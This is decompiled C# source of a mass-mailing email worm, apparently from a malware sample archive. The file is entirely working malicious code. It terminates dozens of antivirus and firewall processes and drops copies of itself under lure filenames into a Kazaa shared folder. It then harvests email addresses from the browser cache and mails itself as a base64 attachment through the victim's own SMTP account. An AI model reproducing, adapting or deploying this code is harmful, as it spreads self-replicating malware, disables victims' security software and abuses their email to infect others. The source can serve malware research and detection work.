MalwareSourceCode/MSIL/Email-Worm/Win32/A/Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105/alcopaul/brigadaochodotnet.cs

// Decompiled with JetBrains decompiler
// Type: alcopaul.brigadaochodotnet
// Assembly: 2peace, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 78079FF0-2005-4E93-BF26-3EA1164CB45F
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Email-Worm.Win32.Alcaul.af-f023c356e68bba6651e4525fa000df7e890871cf4ef714e11171e439c3090105.exe

using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.IO;
using System.Net.Sockets;
using System.Reflection;
using System.Text;
using System.Windows.Forms;

namespace alcopaul
{
  public class brigadaochodotnet
  {
    public static void Main(string[] args)
    {
      string str1 = "zonealarm,wfindv32,vb6,webscanx,vsstat,vshwin32,vsecomr,vscan40,vettray,vet95,tds2-nt,tds2-98,tca,tbscan,sweep95,sphinx,smc,serv95,scrscan,scanpm,scan95,scan32,safeweb,rescue,rav7win,rav7,persfw,pcfwallicon,pccwin98,pavw,pavsched,pavcl,padmin,outpost,nvc95,nupgrade,normist,nmain,nisum,navwnt,navw32,navnt,navlu32,navapw32,n32scanw,mpftray,moolive,luall,lookout,lockdown2000,jedi,iomon98,iface,icsuppnt,icsupp95,icmon,icloadnt,icload95,ibmavsp,ibmasn,iamserv,iamapp,frw,fprot,fp-win,findviru,f-stopw,f-prot95,f-prot,f-agnt95,espwatch,esafe,ecengine";
      string str2 = "dvp95_0,dvp95,cleaner3,cleaner,claw95cf,claw95,cfinet32,cfinet,cfiaudit,cfiadmin,blackice,blackd,avwupd32,avwin95,avsched32,avpupd,avptc32,avpm,avpdos32,avpcc,avp32,avp,avnt,avkserv,avgctrl,ave32,avconsol,autodown,apvxdwin,anti-trojan,ackwin32,_avpm,_avpcc,_avp32";
      string[] strArray1 = str1.Split(',');
      string[] strArray2 = str2.Split(',');
      foreach (string ave in strArray1)
        brigadaochodotnet.killprocs(ave);
      foreach (string ave in strArray2)
        brigadaochodotnet.killprocs(ave);
      Module module = Assembly.GetExecutingAssembly().GetModules()[0];
      string tach = brigadaochodotnet.uue(module.FullyQualifiedName);
      Registry.CurrentUser.OpenSubKey("Software\\Kazaa\\LocalContent", true).SetValue("Dir0", (object) ("012345:" + Directory.GetCurrentDirectory()));
      string[] strArray3 = new string[11]
      {
        "shakira.exe",
        "avril_lavigne.exe",
        "Visual_Studio.NET2003_key.exe",
        "teach_yourself_c#_in_1_week.exe",
        "scan.net.exe",
        "hitman2fulldownloader.exe",
        "Tekken4_full_downloader.exe",
        "teach_yourself_COBOL.NET_in_21_days.exe",
        "how_to_get_chicks_on_your_bed.exe",
        "brigadaocho.net.exe",
        "drunken_pope_pics.exe"
      };
      foreach (string destFileName in strArray3)
      {
        try
        {
          File.Copy(module.FullyQualifiedName, destFileName);
        }
        catch
        {
        }
      }
      RegistryKey registryKey1 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager", true);
      RegistryKey registryKey2 = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Internet Account Manager\\Accounts\\" + registryKey1.GetValue("Default Mail Account").ToString(), true);
      string mserv = registryKey2.GetValue("SMTP Server").ToString();
      string fm = registryKey2.GetValue("SMTP Email Address").ToString();
      foreach (string directory1 in Directory.GetDirectories(Environment.GetFolderPath(Environment.SpecialFolder.InternetCache)))
      {
        foreach (string directory2 in Directory.GetDirectories(directory1))
        {
          foreach (string file in Directory.GetFiles(directory2, "*.ht*"))
            brigadaochodotnet.extractmails(file, mserv, fm, tach);
        }
      }
      int num = (int) MessageBox.Show("brigada ocho ::: \"bringing the c# technology to the masses\"", "msil.mass by PerrunBoy ::: http://vx.netlux.org/~b8", MessageBoxButtons.OK, MessageBoxIcon.Exclamation);
    }

    public static void extractmails(string phile, string mserv, string fm, string tach)
    {
      StreamReader streamReader = new StreamReader((Stream) new FileStream(phile, FileMode.OpenOrCreate, FileAccess.Read));
      streamReader.BaseStream.Seek(0L, SeekOrigin.Begin);
      while (streamReader.Peek() > -1)
      {
        string to = brigadaochodotnet.xtrak(streamReader.ReadLine());
        if (to != "")
          brigadaochodotnet.castaway(mserv, fm, to, tach);
      }
      streamReader.Close();
    }

    public static string xtrak(string datum)
    {
      char[] anyOf = new char[6]
      {
        '?',
        '\'',
        '"',
        '>',
        '<',
        ' '
      };
      string str1 = datum;
      try
      {
        int sourceIndex = str1.IndexOf("mailto:");
        int num = str1.LastIndexOfAny(anyOf);
        char[] destination1 = new char[(int) checked ((uint) unchecked (num - sourceIndex))];
        str1.CopyTo(sourceIndex, destination1, 0, num - sourceIndex);
        string str2 = new string(destination1).Replace("mailto:", "").Replace("%20", "").Replace("%40", "@");
        try
        {
          int count = str2.IndexOfAny(anyOf);
          char[] destination2 = new char[(int) checked ((uint) count)];
          str2.CopyTo(0, destination2, 0, count);
          return new string(destination2);
        }
        catch
        {
          return str2;
        }
      }
      catch
      {
        return "";
      }
    }

    public static string uue(string attch)
    {
      FileStream input = new FileStream(attch, FileMode.OpenOrCreate, FileAccess.Read);
      BinaryReader binaryReader = new BinaryReader((Stream) input);
      binaryReader.BaseStream.Seek(0L, SeekOrigin.Begin);
      byte[] numArray = new byte[(int) checked ((uint) input.Length)];
      int length1 = (int) input.Length;
      int index1 = 0;
      int num;
      for (; length1 > 0; length1 -= num)
      {
        num = binaryReader.Read(numArray, index1, length1);
        if (num != 0)
          index1 += num;
        else
          break;
      }
      binaryReader.Close();
      StringBuilder stringBuilder = new StringBuilder();
      string base64String = Convert.ToBase64String(numArray);
      int length2 = base64String.Length;
      char[] destination = new char[(int) checked ((uint) length2)];
      base64String.CopyTo(0, destination, 0, length2);
      for (int index2 = 1; index2 <= length2; ++index2)
      {
        if (index2 % 76 == 0)
          stringBuilder.Append(string.Format("{0}\r\n", (object) destination[index2 - 1]));
        else
          stringBuilder.Append(string.Format("{0}", (object) destination[index2 - 1]));
      }
      return stringBuilder.ToString();
    }

    public static void killprocs(string ave)
    {
      foreach (Process process in Process.GetProcessesByName(ave))
        process.Kill();
    }

    public static void castaway(string serv, string from, string to, string attch)
    {
      string str1 = "From: " + from + " <" + from + ">\r\n";
      string str2 = "To: " + to + " <" + to + ">\r\n";
      string str3 = "Date: " + DateTime.Now.ToString() + "\r\n";
      string str4 = "X-Mailer: dotNETSMTPengine\r\n";
      string str5 = "X-Priority: 3\r\n";
      string str6 = "MIME-Version: 1.0\r\n";
      string str7 = "Content-Type: multipart/mixed; boundary=\"----=rerty\";\r\n\r\n";
      string str8 = "This is a multi-part message in MIME format.\r\n\r\n";
      string str9 = "------=rerty\r\n";
      string str10 = "Content-Type: text/html; charset=us-ascii\r\n\r\n";
      string str11 = "\"all we are saying, is give peace a chance. no to war and terrorism.\"\r\n\r\n";
      string str12 = "------=rerty\r\n";
      string str13 = "Content-Type: application/x-msdownload; name=\"topeace.exe\"\r\n";
      string str14 = "Content-Transfer-Encoding: base64\r\n";
      string str15 = "Content-Disposition: attachment; ";
      string str16 = "filename=\"topeace.exe\"\r\n\r\n";
      string str17 = "\r\n\r\n";
      string str18 = "------=rerty--\r\n\r\n.\r\n";
      TcpClient tcpClient = new TcpClient(serv, 25);
      NetworkStream stream = tcpClient.GetStream();
      StreamReader streamReader = new StreamReader((Stream) tcpClient.GetStream());
      string str19 = streamReader.ReadLine();
      byte[] bytes1 = Encoding.ASCII.GetBytes("HELO localhost\r\n");
      stream.Write(bytes1, 0, bytes1.Length);
      str19 = streamReader.ReadLine();
      byte[] bytes2 = Encoding.ASCII.GetBytes("MAIL FROM: <" + from + ">\r\n");
      stream.Write(bytes2, 0, bytes2.Length);
      str19 = streamReader.ReadLine();
      byte[] bytes3 = Encoding.ASCII.GetBytes("RCPT TO: <" + to + ">\r\n");
      stream.Write(bytes3, 0, bytes3.Length);
      str19 = streamReader.ReadLine();
      byte[] bytes4 = Encoding.ASCII.GetBytes("DATA\r\n");
      stream.Write(bytes4, 0, bytes4.Length);
      str19 = streamReader.ReadLine();
      byte[] bytes5 = Encoding.ASCII.GetBytes(str1 + str2 + str3 + str4 + str5);
      stream.Write(bytes5, 0, bytes5.Length);
      byte[] bytes6 = Encoding.ASCII.GetBytes(str6 + str7 + str8 + str9 + str10 + str11);
      stream.Write(bytes6, 0, bytes6.Length);
      byte[] bytes7 = Encoding.ASCII.GetBytes(str12 + str13 + str14 + str15 + str16 + attch + str17 + str18);
      stream.Write(bytes7, 0, bytes7.Length);
      str19 = streamReader.ReadLine();
      byte[] bytes8 = Encoding.ASCII.GetBytes("QUIT\r\n");
      stream.Write(bytes8, 0, bytes8.Length);
      str19 = streamReader.ReadLine();
      stream.Close();
      streamReader.Close();
      tcpClient.Close();
    }
  }
}